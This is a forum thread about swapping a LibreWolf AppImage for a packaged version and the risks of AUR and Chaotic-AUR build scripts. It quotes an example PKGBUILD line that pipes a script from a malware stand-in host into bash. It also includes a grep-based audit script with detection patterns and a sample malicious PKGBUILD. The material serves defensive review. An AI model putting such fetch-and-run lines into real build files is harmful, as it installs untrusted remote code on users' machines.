[SOLVED] Replace LibreWolf AppImage by repo version

It takes only one… :scream: :scream_cat:

True, as we have seen in recent months…


The key here is to decrease your dependency on potentially evil people.

Dalto wrote a great FAQ about third-party repos that everyone should read:

I would like to add to this that third party repos that automate building packages from the AUR like, for example, the Chaotic-AUR, seem especially dangerous to me. If I were a malicious person wanting to spread my malware, one way I could potentially do it is through the Chaotic-AUR, since it automatically builds packages from the AUR and there is no checking of PKGBUILDs. So all it would probably take is to upload a malicious PKGBUILD to the AUR at just the right moment for it to get pulled to the Chaotic-AUR.


Too late, I’ve already got too paranoid. See-compile you later on Gentoo! :rofl:


So, AUR is not considered 3rd party? Why is that?
After all, the packages in there are not Arch, and in fact I have seen warnings about using AUR precisely because the packages are compiled by others.

So, your comment confuses me a bit.

The AUR is not a repo at all (it’s a misnomer). It does not contain any packages, just build scripts that contain the instructions on how to make packages yourself, locally.

When you install from the AUR, you do the packaging yourself, so you can know exactly what goes into the package, and thus it’s your responsibility not to let any malware slip into the package.


OK, it contains build scripts, but those could be malignant, and they are certainly not compiled by Arch.

Yes, a PKGBUILD could easily contain a line like:

/bin/bash <(curl -s http://www.malware.com/install_bitcoin_miner.sh)

It can also contain stupid mistakes by people writing the code, which are not intentionally malicious, but can nevertheless destroy your system and cause you to lose data. For example:

That’s why you should check it whenever you’re building a package from the AUR. Also, read the comments on the AUR webpage, stick to more popular packages and report anything malevolent or suspicious. Also, you should have all important data backed up, that should go without saying.

However, the PKGBUILD used to build packages in the repos could also contain something like above (well, it probably wouldn’t install malware on the packager’s local computer, that would be stupid :rofl:). The difference is that you cannot check for that, since the package is already built when you get it, hence you are blindly trusting the packager.

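The check the post above recommends (read the PKGBUILD before makepkg runs it) can be partly automated. The script below is an added example for this thread, not code from the forum, from yay or from makepkg. It greps a PKGBUILD for the things a reviewer looks at first: a downloaded script piped into a shell (the exact line quoted above), network access outside the source=() array, sudo or setuid bits, recursive deletes outside $srcdir/$pkgdir, obfuscated commands, and checksums set to SKIP. The two sample PKGBUILDs it writes (example-bin, example.org) are constructed for the demo and are not real AUR packages, and every pattern is an assumption about what deserves a look, so a hit means "read this line", not "this is malware", and a clean run does not mean the file is safe.

```shell
#!/bin/sh
# Heuristic pre-build audit of a PKGBUILD. Added example for this thread, not
# code from the forum, yay, or makepkg. Every pattern is an assumption about
# what "looks suspicious"; the output is a list of lines to read, not a verdict.

# check LABEL ERE FILE: print the lines of FILE matching ERE under LABEL.
# Returns 1 if anything matched, 0 otherwise.
check() {
    label="$1"; pattern="$2"; file="$3"
    if matches=$(grep -nE "$pattern" "$file"); then
        printf '[%s]\n%s\n' "$label" "$matches"
        return 1
    fi
    return 0
}

# audit_pkgbuild FILE: run every check, print "findings: N", return N
# (0 means nothing was flagged).
audit_pkgbuild() {
    f="$1"; hits=0
    # 1. The pattern from the post: download a script and execute it at build
    #    or install time (curl ... | sh, wget ... | bash, bash <(curl ...)).
    check 'remote script piped into a shell' \
        '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|(ba)?sh[[:space:]]+<\(' "$f" || hits=$((hits + 1))
    # 2. makepkg fetches source=() itself; a PKGBUILD function has no reason
    #    to call a downloader or git clone on its own.
    check 'network access outside the source=() array' \
        '(^|[^[:alnum:]_])(curl|wget|git[[:space:]]+clone)([^[:alnum:]_]|$)' "$f" || hits=$((hits + 1))
    # 3. Privilege escalation or setuid/setgid bits (chmod u+s, chmod 4755).
    check 'privilege escalation or setuid/setgid bit' \
        '(^|[^[:alnum:]_])(sudo|doas|su)([[:space:]]|$)|chmod[[:space:]]+([ugoa]*\+[^[:space:]]*s|[0-7]?[2-7][0-7]{3})' "$f" || hits=$((hits + 1))
    # 4. Recursive deletes of paths not under $srcdir/$pkgdir: absolute paths,
    #    ~ and $HOME (the "stupid mistake" class the post mentions).
    check 'recursive rm outside srcdir/pkgdir' \
        'rm[[:space:]]+-[[:alpha:]]*[rR][[:alpha:]]*[[:space:]]+[[:punct:]]?(/|~|\$\{?HOME)' "$f" || hits=$((hits + 1))
    # 5. Obfuscation: eval, base64-decoded payloads, hex-escaped strings.
    check 'obfuscated or dynamically built commands' \
        '(^|[^[:alnum:]_])eval[[:space:]]|base64[[:space:]]+(-d|--decode)|\\x[0-9a-fA-F]{2}' "$f" || hits=$((hits + 1))
    # 6. Checksums disabled. Normal for VCS (-git) packages, a red flag for
    #    anything shipping a tarball or prebuilt binary such as a -bin package.
    check 'checksum verification skipped' \
        '^(md5|sha1|sha224|sha256|sha384|sha512|b2)sums=.*SKIP' "$f" || hits=$((hits + 1))
    printf 'findings: %d\n' "$hits"
    return "$hits"
}

# count_findings FILE: only the number of flagged categories (always exits 0).
count_findings() {
    audit_pkgbuild "$1" | sed -n 's/^findings: //p'
}

# write_samples DIR: two constructed PKGBUILDs (not real AUR packages).
# clean.PKGBUILD is an ordinary -bin package; bad.PKGBUILD is the same package
# with the curl-into-bash line from the post, a setuid bit, a delete under
# $HOME and checksums switched off.
write_samples() {
    cat > "$1/clean.PKGBUILD" <<'EOF'
pkgname=example-bin
pkgver=1.0.0
pkgrel=1
arch=('x86_64')
source=("https://example.org/example-${pkgver}-x86_64.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
package() {
    install -Dm755 "$srcdir/example-${pkgver}/example" "$pkgdir/usr/bin/example"
    rm -rf "$pkgdir/usr/share/doc/unused"
}
EOF
    cat > "$1/bad.PKGBUILD" <<'EOF'
pkgname=example-bin
pkgver=1.0.0
pkgrel=2
arch=('x86_64')
source=("https://example.org/example-${pkgver}-x86_64.tar.gz")
sha256sums=('SKIP')
package() {
    install -Dm755 "$srcdir/example-${pkgver}/example" "$pkgdir/usr/bin/example"
    /bin/bash <(curl -s http://www.malware.com/install_bitcoin_miner.sh)
    chmod 4755 "$pkgdir/usr/bin/example"
    rm -rf "$HOME/.cache/old"
}
EOF
}

# Demo on the constructed samples (run directly: sh audit_pkgbuild.sh).
demo_dir=$(mktemp -d)
write_samples "$demo_dir"
for name in clean bad; do
    printf '== %s.PKGBUILD ==\n' "$name"
    audit_pkgbuild "$demo_dir/$name.PKGBUILD" || echo "read the flagged lines before running makepkg"
done
rm -rf "$demo_dir"
```

To use it on a real package, run it on the PKGBUILD you get from `yay -G <package>` (getpkgbuild) or from the AUR web page, and still read the whole file afterwards: the script does not look at .install scripts, at patches, or at whether the source=() URLs point at the real upstream, and those are exactly the places a careful attacker would use.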

I have installed librewolf-bin with success, so I will delete the appimage. I have marked one of your comments as the solution, and will mark this thread as solved.
Thanks for your help.

My take-away from this thread is:

  • use apps from official repos (Endeavour or Arch)
  • use a bin package if possible, install with yay (I love yay)
  • use AUR with care
  • don’t use chaotic-AUR

Thanks also to @ishaan2479, @manuel and @keybreak for your input.


One more take-away:

  • ask here if you are not sure about the reliability of the source of the install

You are right. Note: that is what my OP at the top of this thread was meant for :wink:

